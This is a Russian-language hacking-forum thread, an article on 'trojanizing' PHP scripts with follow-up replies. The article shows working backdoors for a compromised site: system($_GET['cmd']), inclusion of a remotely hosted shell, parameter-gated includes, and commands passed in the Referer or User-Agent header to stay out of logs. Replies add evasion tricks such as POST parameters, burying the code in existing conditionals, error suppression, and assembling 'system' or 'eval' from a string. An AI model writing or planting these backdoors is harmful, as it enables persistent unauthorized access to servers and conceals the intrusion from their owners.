Форум АНТИЧАТ - Троянизация скриптов

Форум АНТИЧАТ (https://forum.antichat.xyz/index.php)

- Авторские статьи (https://forum.antichat.xyz/forumdisplay.php?f=31)

- - Троянизация скриптов (https://forum.antichat.xyz/showthread.php?t=30873)

Троянизация скриптов

Троянизация скриптов

В этой статье будут описаны методы троянизациии серверных скриптов, написанных на PHP.

=========
Вариант 1
=========

Началось всё с того что получив шелл на сайте, я захотел как-то закрепиться и добавил в
index.php код такого содержания

PHP код:


		
			
<?php system($_GET["cmd"]) ?>

Вскоре полноценный шелл был удалён, остался только указанный выше.
Я попробовал залить полноценный, но оказалось что на серваке нет ни wget, curl, etc....

=========
Вариант 2
=========

Тогда почему же не индклудить шелл каждый раз при загрузке страници

PHP код:


		
			
<?php include("http://gaga.phpnet.us/shell.txt"); ?>

Лучше инклудить шелл, только при определенный параметрах. Сделаем более интерактивнее :

PHP код:


		
			
<?php if(@$_GET["hack"] == "yes") include($_GET['file']); ?>

При переходе по адресу, указанному ниже мы получим удаллённый шелл

Код:

http://[сайт]/index.php?hack=yes&file=[шелл]

=========
Вариант 3
=========

А что если мы протроянили скрипты таким способом, а на сервере allow_url_fopen = Off;
Тогда используем такую конструкцию :

PHP код:


		
			
<?php if(ini_get('allow_url_fopen')) include ($_GET["file"]); else system($_GET["cmd"]); ?>

У нас есть и удаленный шелл, и командная строка. Можно ещё проверить разрешены ли функции
exec(), system(), passthru(), но это увеличит размер.
Добавим авторизацию:

PHP код:


		
			
<?php if(@$_GET["hack"] == "yes") if(ini_get('allow_url_fopen')) include ($_GET["file"]); else system($_GET["cmd"]); ?>

=========
Вариант 4
=========

В приведенных выше примерах данные передаються через адресную строку браузера.
Чтобы в логах не было видно всех параметров, изменим немного исходники

PHP код:


		
			
<?php if(ini_get('allow_url_fopen')) include ($_SERVER["HTTP_REFERER"]); else system($_SERVER["HTTP_REFERER"]); ?>

В реферере, в зависимости от настроек php.ini, будет адрес шелла, или системная команда.

=========
Заключение
=========

Для изменения заголовков на лету можно использовать програму HTTPSubstitute от Zadoxlik'a
http://forum.antichat.ru/thread23569.html
Примеры скрытия Php кода опсаны в статье Great'a
http://forum.antichat.ru/thread28246.html

> но оказалось что на серваке нет ни wget, curl, etc....
Если у тебя есть право на сокеты, считай, шелл скачал)

Частичный бойан, но оформление красивое)

[ADDED]
Вы добавили слишком много репутации в последние 24 часа. Попробуйте попозже.
ггг

Эх ... почти =)) хотел про другое написать ... лана на вечер оставлю (:

Чтобы не удаляли <?php system($_GET["cmd"]) ?> юзай пост.. чтобы не палиться особо в логах
дальше.. можно незаметно включить в серию иф-елсов конструкцию (которая уже присутствует в файлах)...

Либо например добавляем свое.. т.е. у нас при условии поста align=1 Или align=0 в юзер агенте появляется шелл

PHP код:


		
			
if ($_POST ['align'] == "1" || $_GET ['align'] == "0") {

     $server_get=$_SERVER['HTTP_USER_AGENT'];

     @include($server_get);

else 

  {

die;

}

или опять же сделать чтониб сложное для понимания... накрутить много условий

угу можно и так но @ ставить для заглушки точно нужно потому как иногда ерроры выскакивают

Блин а где еще была тема про троянизацию скритов я помню кто то отписывал как лицинзеонное соглащение в массив загнать потом выдрать нужные символы и исполнить, вообще зря замяли тему.

2cash моно сделать примерно так:

Код:

<?

$lic = "abcdefghijklmnopqrstuvwxyz итд.";

$с = (собираешь слово system или eval);

$c ($_POST['cmd']);

?>

и никто не доепется =)

мда токо название входящей переменной надо поменять га др. cmd не катит.

Для примера написал

Цитата:

http://forum.antichat.ru/thread28246-gnu+gpl.html